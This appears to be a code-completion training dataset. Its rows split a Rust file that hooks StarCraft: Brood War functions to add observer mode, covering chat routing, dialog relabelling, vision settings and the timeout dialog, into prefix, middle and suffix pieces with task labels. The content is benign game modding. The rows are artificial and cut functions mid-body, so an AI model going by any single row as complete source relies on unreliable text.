replay_command.as_ptr(),
replay_command.len() as u32,
storm_player,
);
if storm_player == *vars::local_storm_id {
// Switch the message to be green to show it's player's own message
let _ = format(&mut buf[..], 0x07);
}
bw_1161::display_message(buf.as_ptr(), 0);
return length;
} else {
orig(storm_player, message, length)
}
}
pub unsafe fn load_dialog_hook(
dialog: *mut bw::Dialog,
base: *mut c_void,
event_handler: *mut c_void,
source_file: *const u8,
source_line: u32,
orig: unsafe extern fn(*mut bw::Dialog, *mut c_void, *mut c_void, *const u8, u32),
) {
orig(dialog, base, event_handler, source_file, source_line);
if !is_local_player_observer() {
return;
}
let name = CStr::from_ptr((*dialog).control.string as *const i8).to_bytes();
if name == b"TextBox" {
if let Some(to_allies) = find_dialog_child(dialog, 0x2) {
(*to_allies).string = b"To Observers:\0".as_ptr();
// Of course the control has to be resized by hand <.<
// Possibly could also just make it left aligned.
// This can be determined "easily" by breaking 1.16.1 in debugger at 004F2FFF when
// opening chat entry while talking to one player, and replacing the "To player:"
// string, and stepping over the call.
(*to_allies).area.right = 0x55;
} else {
error!("Couldn't find 'To Allies:' control");
}
} else if name == b"MsgFltr" {
if let Some(to_allies) = find_dialog_child(dialog, 0x3) {
(*to_allies).string = b"Send to observers\0".as_ptr();
} else {
error!("Couldn't find 'Send to allies' control");
}
}
}
pub unsafe fn init_ui_variables_hook(orig: unsafe extern fn()) {
orig();
if is_local_player_observer() {
*vars::replay_visions = 0xff;
*vars::player_visions = 0xff;
// To allies (=observers)
(*vars::game).chat_dialog_recipient = 9;
// Could also set the race, it currently just does an overflow read to zerg.
}
}
pub unsafe fn cmdbtn_event_handler_hook(
control: *mut bw::Control,
event: *mut bw::UiEvent,
orig: unsafe extern fn(*mut bw::Control, *mut bw::UiEvent) -> u32,
) -> u32 {
if !is_local_player_observer() {
orig(control, event)
} else {
// Disable clicking on command buttons.
// Event 4 = Left click, 6 = Double click, Extended 3 = Hotkey
if (*event).ty == 0x4 || (*event).ty == 0x6 {
0
} else if (*event).ty == 0xe && (*event).extended_type == 3 {
1
} else {
orig(control, event)
}
}
}
pub unsafe fn get_gluall_string_hook(
string_id: u32,
orig: unsafe extern fn(u32) -> *const u8,
) -> *const u8 {
// Replace "Replay players" text in the alliance dialog when observing
if string_id == 0xb6 && is_local_player_observer() {
"Players\0".as_ptr()
} else {
orig(string_id)
}
}
pub unsafe fn update_net_timeout_players(orig: unsafe extern fn()) {
unsafe fn find_timeout_dialog_player_label(bw_player: u8) -> Option<*mut bw::Control> |
// To make observers appear in network timeout dialog, we temporarily write their info to
// ingame player structure, and revert the change after this function has been called.
let bw_players: &mut [bw::Player] = &mut vars::players[..8];
let actual_players: [bw::Player; 8] = {
let mut players: [bw::Player; 8] = mem::zeroed();
for i in 0..players.len() {
players[i] = bw_players[i].clone();
}
players
};
let mut overwritten_player_id_to_storm = [None; 8];
for storm_id in 0..8 {
let is_obs = !actual_players.iter().any(|x| x.storm_id == storm_id);
if is_obs {
match bw_players
.iter()
.position(|x| x.player_type != bw::PLAYER_TYPE_HUMAN)
{
Some(pos) => {
overwritten_player_id_to_storm[pos] = Some(storm_id);
bw_players[pos].storm_id = storm_id;
bw_players[pos].player_type = bw::PLAYER_TYPE_HUMAN;
}
None => {
error!(
"Net timeout dialog: Out of player slots for observer, storm id {}",
storm_id
);
}
}
}
}
orig();
for bw_player in 0..8 {
if let Some(storm_id) = overwritten_player_id_to_storm[bw_player] {
if let Some(ctrl) = find_timeout_dialog_player_label(bw_player as u8) {
// We need to redirect the name string to the storm player string, and replace the
// player value to unused player 10, whose color will be set to neutral resource
// color. (The neutral player 11 actually can have a different color for neutral
// buildings)
//
// Technically player 10 can actually have units in some odd UMS maps, but we
// aren't allowing observing UMS games anyways, so whatever. Even if the someone
// noticed the color changing, I doubt they would care.
(*ctrl).string = vars::storm_players[storm_id as usize].name.as_ptr();
(*ctrl).user_ptr = 10usize as *mut c_void;
(*vars::game).player_minimap_color[10] = *vars::resource_minimap_color;
}
}
}
for (i, player) in actual_players.iter().enumerate() {
vars::players[i] = player.clone();
}
}
pub unsafe fn update_command_card_hook(orig: unsafe extern fn()) {
if is_local_player_observer() && !(*vars::primary_selected).is_null() {
*vars::local_nation_id = (**vars::primary_selected).player as u32;
orig();
*vars::local_nation_id = !0;
} else {
orig();
}
}
pub unsafe fn draw_command_button_hook(
control: *mut bw::Control,
x: i32,
y: i32,
area: *mut c_void,
orig: unsafe extern fn(*mut bw::Control, i32, i32, *mut c_void),
) {
// Need to disable replay flag being set from DrawScreenHook if observing
let was_replay = *vars::is_replay;
if is_local_player_observer() {
*vars::is_replay = 0;
}
orig(control, x, y, area);
*vars::is_replay = was_replay;
}
pub unsafe fn center_screen_on_start_location(
unit: *mut bw::PreplacedUnit,
other: *mut c_void,
orig: unsafe extern fn(*mut bw::PreplacedUnit, *mut c_void) -> u32,
) -> u32 {
let was_replay = *vars::is_replay;
if is_local_player_observer() && vars::players[(*unit).player as usize].player_type != 0 {
// Center the screen once we get the first active player so observers don't randomly
// end up staring at unused start location.
*vars::is_replay = 1;
}
let result = orig(unit, other);
*vars::is_replay = was_replay;
result
}
unsafe fn find_dialog_child(dialog: *mut bw::Dialog, child_id: i16) -> Option<*mut bw::Control> {
let mut control = (*dialog).first_child;
while !control.is_null() {
if (*control).id == child_id {
return Some(control);
}
control = (*control).next;
}
None
}
unsafe fn is_local_player_observer() -> bool {
// Should probs use shieldbattery's data instead of checking BW variables,
// but we don't have anything that's readily accessible by game thread.
*vars::local_nation_id == !0
}
pub unsafe fn with_replay_flag_if_obs<F: FnOnce() -> R, R>(func: F) -> R {
let was_replay = *vars::is_replay;
if is_local_player_observer() {
*vars::is_replay = 1;
}
let ret = func();
*vars::is_replay = was_replay;
ret
}
| {
if (*vars::timeout_bin).is_null() {
return None;
}
let mut label = find_dialog_child(*vars::timeout_bin, -10)?;
let mut label_count = 0;
while !label.is_null() && label_count < 8 {
// Flag 0x8 == Shown
if (*label).flags & 0x8 != 0 && (*label).user_ptr as usize == bw_player as usize {
return Some(label);
}
label = (*label).next;
label_count += 1;
}
None
} | identifier_body |
observing.rs | use std::ffi::CStr;
use std::mem;
use libc::c_void;
use crate::bw;
use crate::bw_1161::{self, vars};
pub unsafe fn process_commands_hook(
data: *const u8,
len: u32,
replay: u32,
orig: unsafe extern fn(*const u8, u32, u32),
) {
if replay == 0 && *vars::current_command_player >= 8 {
// Replace anything sent by observers with a keep alive command, I'm quite sure there will
// be buffer overflows otherwise.
let buf = [0x05u8];
orig(buf.as_ptr(), 1, replay);
} else {
orig(data, len, replay);
}
}
// Don't validate sync commands when observing. As the sync contains visibility info, observers
// are out of sync from everyone else, as their vision settings are not sent to other players.
pub unsafe fn sync_command_hook(
data: *const u8,
orig: unsafe extern fn(*const u8) -> u32,
) -> u32 {
if is_local_player_observer() {
1
} else {
orig(data)
}
}
pub unsafe fn | (
storm_player: u32,
message: *const u8,
length: u32,
orig: unsafe extern fn(u32, *const u8, u32) -> u32,
) -> u32 {
use std::io::Write;
if vars::storm_id_to_human_id[storm_player as usize] >= 8 {
// Observer message, we'll have to manually print text and add to replay recording.
let message = std::slice::from_raw_parts(message, length as usize);
// The length should include null byte
if message.last() != Some(&0) {
return 0;
}
// There's some unnecessary control information at the start of message
let text = match message.get(2..(message.len() - 1)) {
Some(s) => s,
None => return 0,
};
let mut buf = [0; 512];
let format = |mut pos: &mut [u8], msg_color: u8| -> Result<(), std::io::Error> {
// Write "\x1f{player}: \x02{message}"
// 0x1f is the neutral cyan color and 0x02 is the regular chat message one.
write!(&mut pos, "\x1f")?;
let name = CStr::from_ptr(
vars::storm_players[storm_player as usize].name.as_ptr() as *const i8
);
pos.write_all(name.to_bytes())?;
write!(&mut pos, ": ")?;
pos.write_all(&[msg_color])?;
pos.write_all(text)?;
Ok(())
};
let _ = format(&mut buf[..], 0x02);
let mut replay_command = [0u8; 0x52];
replay_command[0] = 0x5c; // Replay chat
replay_command[1] = 0x8; // Player
let _ = (&mut replay_command[2..]).write(&buf[..]);
replay_command[0x51] = 0;
bw_1161::add_to_replay_data(
*vars::replay_data,
replay_command.as_ptr(),
replay_command.len() as u32,
storm_player,
);
if storm_player == *vars::local_storm_id {
// Switch the message to be green to show it's player's own message
let _ = format(&mut buf[..], 0x07);
}
bw_1161::display_message(buf.as_ptr(), 0);
return length;
} else {
orig(storm_player, message, length)
}
}
pub unsafe fn load_dialog_hook(
dialog: *mut bw::Dialog,
base: *mut c_void,
event_handler: *mut c_void,
source_file: *const u8,
source_line: u32,
orig: unsafe extern fn(*mut bw::Dialog, *mut c_void, *mut c_void, *const u8, u32),
) {
orig(dialog, base, event_handler, source_file, source_line);
if !is_local_player_observer() {
return;
}
let name = CStr::from_ptr((*dialog).control.string as *const i8).to_bytes();
if name == b"TextBox" {
if let Some(to_allies) = find_dialog_child(dialog, 0x2) {
(*to_allies).string = b"To Observers:\0".as_ptr();
// Of course the control has to be resized by hand <.<
// Possibly could also just make it left aligned.
// This can be determined "easily" by breaking 1.16.1 in debugger at 004F2FFF when
// opening chat entry while talking to one player, and replacing the "To player:"
// string, and stepping over the call.
(*to_allies).area.right = 0x55;
} else {
error!("Couldn't find 'To Allies:' control");
}
} else if name == b"MsgFltr" {
if let Some(to_allies) = find_dialog_child(dialog, 0x3) {
(*to_allies).string = b"Send to observers\0".as_ptr();
} else {
error!("Couldn't find 'Send to allies' control");
}
}
}
pub unsafe fn init_ui_variables_hook(orig: unsafe extern fn()) {
orig();
if is_local_player_observer() {
*vars::replay_visions = 0xff;
*vars::player_visions = 0xff;
// To allies (=observers)
(*vars::game).chat_dialog_recipient = 9;
// Could also set the race, it currently just does an overflow read to zerg.
}
}
pub unsafe fn cmdbtn_event_handler_hook(
control: *mut bw::Control,
event: *mut bw::UiEvent,
orig: unsafe extern fn(*mut bw::Control, *mut bw::UiEvent) -> u32,
) -> u32 {
if !is_local_player_observer() {
orig(control, event)
} else {
// Disable clicking on command buttons.
// Event 4 = Left click, 6 = Double click, Extended 3 = Hotkey
if (*event).ty == 0x4 || (*event).ty == 0x6 {
0
} else if (*event).ty == 0xe && (*event).extended_type == 3 {
1
} else {
orig(control, event)
}
}
}
pub unsafe fn get_gluall_string_hook(
string_id: u32,
orig: unsafe extern fn(u32) -> *const u8,
) -> *const u8 {
// Replace "Replay players" text in the alliance dialog when observing
if string_id == 0xb6 && is_local_player_observer() {
"Players\0".as_ptr()
} else {
orig(string_id)
}
}
pub unsafe fn update_net_timeout_players(orig: unsafe extern fn()) {
unsafe fn find_timeout_dialog_player_label(bw_player: u8) -> Option<*mut bw::Control> {
if (*vars::timeout_bin).is_null() {
return None;
}
let mut label = find_dialog_child(*vars::timeout_bin, -10)?;
let mut label_count = 0;
while !label.is_null() && label_count < 8 {
// Flag 0x8 == Shown
if (*label).flags & 0x8 != 0 && (*label).user_ptr as usize == bw_player as usize {
return Some(label);
}
label = (*label).next;
label_count += 1;
}
None
}
// To make observers appear in network timeout dialog, we temporarily write their info to
// ingame player structure, and revert the change after this function has been called.
let bw_players: &mut [bw::Player] = &mut vars::players[..8];
let actual_players: [bw::Player; 8] = {
let mut players: [bw::Player; 8] = mem::zeroed();
for i in 0..players.len() {
players[i] = bw_players[i].clone();
}
players
};
let mut overwritten_player_id_to_storm = [None; 8];
for storm_id in 0..8 {
let is_obs = !actual_players.iter().any(|x| x.storm_id == storm_id);
if is_obs {
match bw_players
.iter()
.position(|x| x.player_type != bw::PLAYER_TYPE_HUMAN)
{
Some(pos) => {
overwritten_player_id_to_storm[pos] = Some(storm_id);
bw_players[pos].storm_id = storm_id;
bw_players[pos].player_type = bw::PLAYER_TYPE_HUMAN;
}
None => {
error!(
"Net timeout dialog: Out of player slots for observer, storm id {}",
storm_id
);
}
}
}
}
orig();
for bw_player in 0..8 {
if let Some(storm_id) = overwritten_player_id_to_storm[bw_player] {
if let Some(ctrl) = find_timeout_dialog_player_label(bw_player as u8) {
// We need to redirect the name string to the storm player string, and replace the
// player value to unused player 10, whose color will be set to neutral resource
// color. (The neutral player 11 actually can have a different color for neutral
// buildings)
//
// Technically player 10 can actually have units in some odd UMS maps, but we
// aren't allowing observing UMS games anyways, so whatever. Even if the someone
// noticed the color changing, I doubt they would care.
(*ctrl).string = vars::storm_players[storm_id as usize].name.as_ptr();
(*ctrl).user_ptr = 10usize as *mut c_void;
(*vars::game).player_minimap_color[10] = *vars::resource_minimap_color;
}
}
}
for (i, player) in actual_players.iter().enumerate() {
vars::players[i] = player.clone();
}
}
pub unsafe fn update_command_card_hook(orig: unsafe extern fn()) {
if is_local_player_observer() && !(*vars::primary_selected).is_null() {
*vars::local_nation_id = (**vars::primary_selected).player as u32;
orig();
*vars::local_nation_id = !0;
} else {
orig();
}
}
pub unsafe fn draw_command_button_hook(
control: *mut bw::Control,
x: i32,
y: i32,
area: *mut c_void,
orig: unsafe extern fn(*mut bw::Control, i32, i32, *mut c_void),
) {
// Need to disable replay flag being set from DrawScreenHook if observing
let was_replay = *vars::is_replay;
if is_local_player_observer() {
*vars::is_replay = 0;
}
orig(control, x, y, area);
*vars::is_replay = was_replay;
}
pub unsafe fn center_screen_on_start_location(
unit: *mut bw::PreplacedUnit,
other: *mut c_void,
orig: unsafe extern fn(*mut bw::PreplacedUnit, *mut c_void) -> u32,
) -> u32 {
let was_replay = *vars::is_replay;
if is_local_player_observer() && vars::players[(*unit).player as usize].player_type != 0 {
// Center the screen once we get the first active player so observers don't randomly
// end up staring at unused start location.
*vars::is_replay = 1;
}
let result = orig(unit, other);
*vars::is_replay = was_replay;
result
}
unsafe fn find_dialog_child(dialog: *mut bw::Dialog, child_id: i16) -> Option<*mut bw::Control> {
let mut control = (*dialog).first_child;
while !control.is_null() {
if (*control).id == child_id {
return Some(control);
}
control = (*control).next;
}
None
}
unsafe fn is_local_player_observer() -> bool {
// Should probs use shieldbattery's data instead of checking BW variables,
// but we don't have anything that's readily accessible by game thread.
*vars::local_nation_id == !0
}
pub unsafe fn with_replay_flag_if_obs<F: FnOnce() -> R, R>(func: F) -> R {
let was_replay = *vars::is_replay;
if is_local_player_observer() {
*vars::is_replay = 1;
}
let ret = func();
*vars::is_replay = was_replay;
ret
}
| chat_message_hook | identifier_name |
observing.rs | use std::ffi::CStr;
use std::mem;
use libc::c_void;
use crate::bw;
use crate::bw_1161::{self, vars};
pub unsafe fn process_commands_hook(
data: *const u8,
len: u32,
replay: u32,
orig: unsafe extern fn(*const u8, u32, u32),
) {
if replay == 0 && *vars::current_command_player >= 8 {
// Replace anything sent by observers with a keep alive command, I'm quite sure there will
// be buffer overflows otherwise.
let buf = [0x05u8];
orig(buf.as_ptr(), 1, replay);
} else {
orig(data, len, replay);
}
}
// Don't validate sync commands when observing. As the sync contains visibility info, observers
// are out of sync from everyone else, as their vision settings are not sent to other players.
pub unsafe fn sync_command_hook(
data: *const u8,
orig: unsafe extern fn(*const u8) -> u32,
) -> u32 {
if is_local_player_observer() {
1
} else {
orig(data)
}
}
pub unsafe fn chat_message_hook(
storm_player: u32,
message: *const u8,
length: u32,
orig: unsafe extern fn(u32, *const u8, u32) -> u32,
) -> u32 {
use std::io::Write;
if vars::storm_id_to_human_id[storm_player as usize] >= 8 {
// Observer message, we'll have to manually print text and add to replay recording.
let message = std::slice::from_raw_parts(message, length as usize);
// The length should include null byte
if message.last() != Some(&0) {
return 0;
}
// There's some unnecessary control information at the start of message
let text = match message.get(2..(message.len() - 1)) {
Some(s) => s,
None => return 0,
};
let mut buf = [0; 512];
let format = |mut pos: &mut [u8], msg_color: u8| -> Result<(), std::io::Error> {
// Write "\x1f{player}: \x02{message}"
// 0x1f is the neutral cyan color and 0x02 is the regular chat message one.
write!(&mut pos, "\x1f")?;
let name = CStr::from_ptr(
vars::storm_players[storm_player as usize].name.as_ptr() as *const i8
);
pos.write_all(name.to_bytes())?;
write!(&mut pos, ": ")?;
pos.write_all(&[msg_color])?;
pos.write_all(text)?;
Ok(())
};
let _ = format(&mut buf[..], 0x02);
let mut replay_command = [0u8; 0x52];
replay_command[0] = 0x5c; // Replay chat
replay_command[1] = 0x8; // Player
let _ = (&mut replay_command[2..]).write(&buf[..]);
replay_command[0x51] = 0;
bw_1161::add_to_replay_data(
*vars::replay_data,
replay_command.as_ptr(),
replay_command.len() as u32,
storm_player,
);
if storm_player == *vars::local_storm_id {
// Switch the message to be green to show it's player's own message
let _ = format(&mut buf[..], 0x07);
}
bw_1161::display_message(buf.as_ptr(), 0);
return length;
} else {
orig(storm_player, message, length)
}
}
pub unsafe fn load_dialog_hook(
dialog: *mut bw::Dialog,
base: *mut c_void,
event_handler: *mut c_void,
source_file: *const u8,
source_line: u32,
orig: unsafe extern fn(*mut bw::Dialog, *mut c_void, *mut c_void, *const u8, u32),
) {
orig(dialog, base, event_handler, source_file, source_line);
if !is_local_player_observer() {
return;
}
let name = CStr::from_ptr((*dialog).control.string as *const i8).to_bytes();
if name == b"TextBox" {
if let Some(to_allies) = find_dialog_child(dialog, 0x2) {
(*to_allies).string = b"To Observers:\0".as_ptr();
// Of course the control has to be resized by hand <.<
// Possibly could also just make it left aligned.
// This can be determined "easily" by breaking 1.16.1 in debugger at 004F2FFF when
// opening chat entry while talking to one player, and replacing the "To player:"
// string, and stepping over the call.
(*to_allies).area.right = 0x55;
} else {
error!("Couldn't find 'To Allies:' control");
}
} else if name == b"MsgFltr" {
if let Some(to_allies) = find_dialog_child(dialog, 0x3) {
(*to_allies).string = b"Send to observers\0".as_ptr();
} else {
error!("Couldn't find 'Send to allies' control");
}
}
}
pub unsafe fn init_ui_variables_hook(orig: unsafe extern fn()) {
orig();
if is_local_player_observer() {
*vars::replay_visions = 0xff;
*vars::player_visions = 0xff;
// To allies (=observers)
(*vars::game).chat_dialog_recipient = 9;
// Could also set the race, it currently just does an overflow read to zerg.
}
}
pub unsafe fn cmdbtn_event_handler_hook(
control: *mut bw::Control,
event: *mut bw::UiEvent,
orig: unsafe extern fn(*mut bw::Control, *mut bw::UiEvent) -> u32,
) -> u32 {
if !is_local_player_observer() {
orig(control, event)
} else {
// Disable clicking on command buttons.
// Event 4 = Left click, 6 = Double click, Extended 3 = Hotkey
if (*event).ty == 0x4 || (*event).ty == 0x6 {
0
} else if (*event).ty == 0xe && (*event).extended_type == 3 {
1
} else {
orig(control, event)
}
}
}
pub unsafe fn get_gluall_string_hook(
string_id: u32,
orig: unsafe extern fn(u32) -> *const u8,
) -> *const u8 {
// Replace "Replay players" text in the alliance dialog when observing
if string_id == 0xb6 && is_local_player_observer() {
"Players\0".as_ptr()
} else {
orig(string_id)
}
}
pub unsafe fn update_net_timeout_players(orig: unsafe extern fn()) {
unsafe fn find_timeout_dialog_player_label(bw_player: u8) -> Option<*mut bw::Control> {
if (*vars::timeout_bin).is_null() {
return None;
}
let mut label = find_dialog_child(*vars::timeout_bin, -10)?;
let mut label_count = 0;
while !label.is_null() && label_count < 8 {
// Flag 0x8 == Shown
if (*label).flags & 0x8 != 0 && (*label).user_ptr as usize == bw_player as usize {
return Some(label);
}
label = (*label).next;
label_count += 1;
}
None
}
// To make observers appear in network timeout dialog, we temporarily write their info to
// ingame player structure, and revert the change after this function has been called.
let bw_players: &mut [bw::Player] = &mut vars::players[..8];
let actual_players: [bw::Player; 8] = {
let mut players: [bw::Player; 8] = mem::zeroed();
for i in 0..players.len() {
players[i] = bw_players[i].clone();
}
players
};
let mut overwritten_player_id_to_storm = [None; 8];
for storm_id in 0..8 {
let is_obs = !actual_players.iter().any(|x| x.storm_id == storm_id);
if is_obs {
match bw_players
.iter()
.position(|x| x.player_type != bw::PLAYER_TYPE_HUMAN)
{
Some(pos) => {
overwritten_player_id_to_storm[pos] = Some(storm_id);
bw_players[pos].storm_id = storm_id;
bw_players[pos].player_type = bw::PLAYER_TYPE_HUMAN;
}
None => {
error!(
"Net timeout dialog: Out of player slots for observer, storm id {}",
storm_id
);
}
}
}
}
orig();
for bw_player in 0..8 {
if let Some(storm_id) = overwritten_player_id_to_storm[bw_player] {
if let Some(ctrl) = find_timeout_dialog_player_label(bw_player as u8) {
// We need to redirect the name string to the storm player string, and replace the
// player value to unused player 10, whose color will be set to neutral resource
// color. (The neutral player 11 actually can have a different color for neutral
// buildings)
//
// Technically player 10 can actually have units in some odd UMS maps, but we
// aren't allowing observing UMS games anyways, so whatever. Even if the someone
// noticed the color changing, I doubt they would care.
(*ctrl).string = vars::storm_players[storm_id as usize].name.as_ptr();
(*ctrl).user_ptr = 10usize as *mut c_void;
(*vars::game).player_minimap_color[10] = *vars::resource_minimap_color;
}
}
}
for (i, player) in actual_players.iter().enumerate() {
vars::players[i] = player.clone();
}
}
pub unsafe fn update_command_card_hook(orig: unsafe extern fn()) {
if is_local_player_observer() && !(*vars::primary_selected).is_null() {
*vars::local_nation_id = (**vars::primary_selected).player as u32;
orig();
*vars::local_nation_id = !0;
} else {
orig();
}
}
pub unsafe fn draw_command_button_hook(
control: *mut bw::Control,
x: i32,
y: i32,
area: *mut c_void,
orig: unsafe extern fn(*mut bw::Control, i32, i32, *mut c_void),
) {
// Need to disable replay flag being set from DrawScreenHook if observing
let was_replay = *vars::is_replay;
if is_local_player_observer() {
*vars::is_replay = 0;
}
orig(control, x, y, area);
*vars::is_replay = was_replay;
}
pub unsafe fn center_screen_on_start_location(
unit: *mut bw::PreplacedUnit,
other: *mut c_void,
orig: unsafe extern fn(*mut bw::PreplacedUnit, *mut c_void) -> u32,
) -> u32 {
let was_replay = *vars::is_replay;
if is_local_player_observer() && vars::players[(*unit).player as usize].player_type != 0 {
// Center the screen once we get the first active player so observers don't randomly
// end up staring at unused start location.
*vars::is_replay = 1;
}
let result = orig(unit, other);
*vars::is_replay = was_replay;
result
}
unsafe fn find_dialog_child(dialog: *mut bw::Dialog, child_id: i16) -> Option<*mut bw::Control> {
let mut control = (*dialog).first_child;
while !control.is_null() {
if (*control).id == child_id {
return Some(control);
}
control = (*control).next; | unsafe fn is_local_player_observer() -> bool {
// Should probs use shieldbattery's data instead of checking BW variables,
// but we don't have anything that's readily accessible by game thread.
*vars::local_nation_id == !0
}
pub unsafe fn with_replay_flag_if_obs<F: FnOnce() -> R, R>(func: F) -> R {
let was_replay = *vars::is_replay;
if is_local_player_observer() {
*vars::is_replay = 1;
}
let ret = func();
*vars::is_replay = was_replay;
ret
} | }
None
}
| random_line_split |
observing.rs | use std::ffi::CStr;
use std::mem;
use libc::c_void;
use crate::bw;
use crate::bw_1161::{self, vars};
pub unsafe fn process_commands_hook(
data: *const u8,
len: u32,
replay: u32,
orig: unsafe extern fn(*const u8, u32, u32),
) {
if replay == 0 && *vars::current_command_player >= 8 {
// Replace anything sent by observers with a keep alive command, I'm quite sure there will
// be buffer overflows otherwise.
let buf = [0x05u8];
orig(buf.as_ptr(), 1, replay);
} else {
orig(data, len, replay);
}
}
// Don't validate sync commands when observing. As the sync contains visibility info, observers
// are out of sync from everyone else, as their vision settings are not sent to other players.
pub unsafe fn sync_command_hook(
data: *const u8,
orig: unsafe extern fn(*const u8) -> u32,
) -> u32 {
if is_local_player_observer() {
1
} else {
orig(data)
}
}
pub unsafe fn chat_message_hook(
storm_player: u32,
message: *const u8,
length: u32,
orig: unsafe extern fn(u32, *const u8, u32) -> u32,
) -> u32 {
use std::io::Write;
if vars::storm_id_to_human_id[storm_player as usize] >= 8 {
// Observer message, we'll have to manually print text and add to replay recording.
let message = std::slice::from_raw_parts(message, length as usize);
// The length should include null byte
if message.last() != Some(&0) {
return 0;
}
// There's some unnecessary control information at the start of message
let text = match message.get(2..(message.len() - 1)) {
Some(s) => s,
None => return 0,
};
let mut buf = [0; 512];
let format = |mut pos: &mut [u8], msg_color: u8| -> Result<(), std::io::Error> {
// Write "\x1f{player}: \x02{message}"
// 0x1f is the neutral cyan color and 0x02 is the regular chat message one.
write!(&mut pos, "\x1f")?;
let name = CStr::from_ptr(
vars::storm_players[storm_player as usize].name.as_ptr() as *const i8
);
pos.write_all(name.to_bytes())?;
write!(&mut pos, ": ")?;
pos.write_all(&[msg_color])?;
pos.write_all(text)?;
Ok(())
};
let _ = format(&mut buf[..], 0x02);
let mut replay_command = [0u8; 0x52];
replay_command[0] = 0x5c; // Replay chat
replay_command[1] = 0x8; // Player
let _ = (&mut replay_command[2..]).write(&buf[..]);
replay_command[0x51] = 0;
bw_1161::add_to_replay_data(
*vars::replay_data,
replay_command.as_ptr(),
replay_command.len() as u32,
storm_player,
);
if storm_player == *vars::local_storm_id {
// Switch the message to be green to show it's player's own message
let _ = format(&mut buf[..], 0x07);
}
bw_1161::display_message(buf.as_ptr(), 0);
return length;
} else {
orig(storm_player, message, length)
}
}
pub unsafe fn load_dialog_hook(
dialog: *mut bw::Dialog,
base: *mut c_void,
event_handler: *mut c_void,
source_file: *const u8,
source_line: u32,
orig: unsafe extern fn(*mut bw::Dialog, *mut c_void, *mut c_void, *const u8, u32),
) {
orig(dialog, base, event_handler, source_file, source_line);
if !is_local_player_observer() {
return;
}
let name = CStr::from_ptr((*dialog).control.string as *const i8).to_bytes();
if name == b"TextBox" {
if let Some(to_allies) = find_dialog_child(dialog, 0x2) {
(*to_allies).string = b"To Observers:\0".as_ptr();
// Of course the control has to be resized by hand <.<
// Possibly could also just make it left aligned.
// This can be determined "easily" by breaking 1.16.1 in debugger at 004F2FFF when
// opening chat entry while talking to one player, and replacing the "To player:"
// string, and stepping over the call.
(*to_allies).area.right = 0x55;
} else {
error!("Couldn't find 'To Allies:' control");
}
} else if name == b"MsgFltr" {
if let Some(to_allies) = find_dialog_child(dialog, 0x3) {
(*to_allies).string = b"Send to observers\0".as_ptr();
} else {
error!("Couldn't find 'Send to allies' control");
}
}
}
pub unsafe fn init_ui_variables_hook(orig: unsafe extern fn()) {
orig();
if is_local_player_observer() {
*vars::replay_visions = 0xff;
*vars::player_visions = 0xff;
// To allies (=observers)
(*vars::game).chat_dialog_recipient = 9;
// Could also set the race, it currently just does an overflow read to zerg.
}
}
pub unsafe fn cmdbtn_event_handler_hook(
control: *mut bw::Control,
event: *mut bw::UiEvent,
orig: unsafe extern fn(*mut bw::Control, *mut bw::UiEvent) -> u32,
) -> u32 {
if !is_local_player_observer() {
orig(control, event)
} else {
// Disable clicking on command buttons.
// Event 4 = Left click, 6 = Double click, Extended 3 = Hotkey
if (*event).ty == 0x4 || (*event).ty == 0x6 {
0
} else if (*event).ty == 0xe && (*event).extended_type == 3 {
1
} else {
orig(control, event)
}
}
}
pub unsafe fn get_gluall_string_hook(
string_id: u32,
orig: unsafe extern fn(u32) -> *const u8,
) -> *const u8 {
// Replace "Replay players" text in the alliance dialog when observing
if string_id == 0xb6 && is_local_player_observer() {
"Players\0".as_ptr()
} else {
orig(string_id)
}
}
pub unsafe fn update_net_timeout_players(orig: unsafe extern fn()) {
unsafe fn find_timeout_dialog_player_label(bw_player: u8) -> Option<*mut bw::Control> {
if (*vars::timeout_bin).is_null() {
return None;
}
let mut label = find_dialog_child(*vars::timeout_bin, -10)?;
let mut label_count = 0;
while !label.is_null() && label_count < 8 {
// Flag 0x8 == Shown
if (*label).flags & 0x8 != 0 && (*label).user_ptr as usize == bw_player as usize {
return Some(label);
}
label = (*label).next;
label_count += 1;
}
None
}
// To make observers appear in network timeout dialog, we temporarily write their info to
// ingame player structure, and revert the change after this function has been called.
let bw_players: &mut [bw::Player] = &mut vars::players[..8];
let actual_players: [bw::Player; 8] = {
let mut players: [bw::Player; 8] = mem::zeroed();
for i in 0..players.len() {
players[i] = bw_players[i].clone();
}
players
};
let mut overwritten_player_id_to_storm = [None; 8];
for storm_id in 0..8 {
let is_obs = !actual_players.iter().any(|x| x.storm_id == storm_id);
if is_obs {
match bw_players
.iter()
.position(|x| x.player_type != bw::PLAYER_TYPE_HUMAN)
{
Some(pos) => {
overwritten_player_id_to_storm[pos] = Some(storm_id);
bw_players[pos].storm_id = storm_id;
bw_players[pos].player_type = bw::PLAYER_TYPE_HUMAN;
}
None => {
error!(
"Net timeout dialog: Out of player slots for observer, storm id {}",
storm_id
);
}
}
}
}
orig();
for bw_player in 0..8 {
if let Some(storm_id) = overwritten_player_id_to_storm[bw_player] {
if let Some(ctrl) = find_timeout_dialog_player_label(bw_player as u8) |
}
}
for (i, player) in actual_players.iter().enumerate() {
vars::players[i] = player.clone();
}
}
pub unsafe fn update_command_card_hook(orig: unsafe extern fn()) {
if is_local_player_observer() && !(*vars::primary_selected).is_null() {
*vars::local_nation_id = (**vars::primary_selected).player as u32;
orig();
*vars::local_nation_id = !0;
} else {
orig();
}
}
pub unsafe fn draw_command_button_hook(
control: *mut bw::Control,
x: i32,
y: i32,
area: *mut c_void,
orig: unsafe extern fn(*mut bw::Control, i32, i32, *mut c_void),
) {
// Need to disable replay flag being set from DrawScreenHook if observing
let was_replay = *vars::is_replay;
if is_local_player_observer() {
*vars::is_replay = 0;
}
orig(control, x, y, area);
*vars::is_replay = was_replay;
}
pub unsafe fn center_screen_on_start_location(
unit: *mut bw::PreplacedUnit,
other: *mut c_void,
orig: unsafe extern fn(*mut bw::PreplacedUnit, *mut c_void) -> u32,
) -> u32 {
let was_replay = *vars::is_replay;
if is_local_player_observer() && vars::players[(*unit).player as usize].player_type != 0 {
// Center the screen once we get the first active player so observers don't randomly
// end up staring at unused start location.
*vars::is_replay = 1;
}
let result = orig(unit, other);
*vars::is_replay = was_replay;
result
}
unsafe fn find_dialog_child(dialog: *mut bw::Dialog, child_id: i16) -> Option<*mut bw::Control> {
let mut control = (*dialog).first_child;
while !control.is_null() {
if (*control).id == child_id {
return Some(control);
}
control = (*control).next;
}
None
}
unsafe fn is_local_player_observer() -> bool {
// Should probs use shieldbattery's data instead of checking BW variables,
// but we don't have anything that's readily accessible by game thread.
*vars::local_nation_id == !0
}
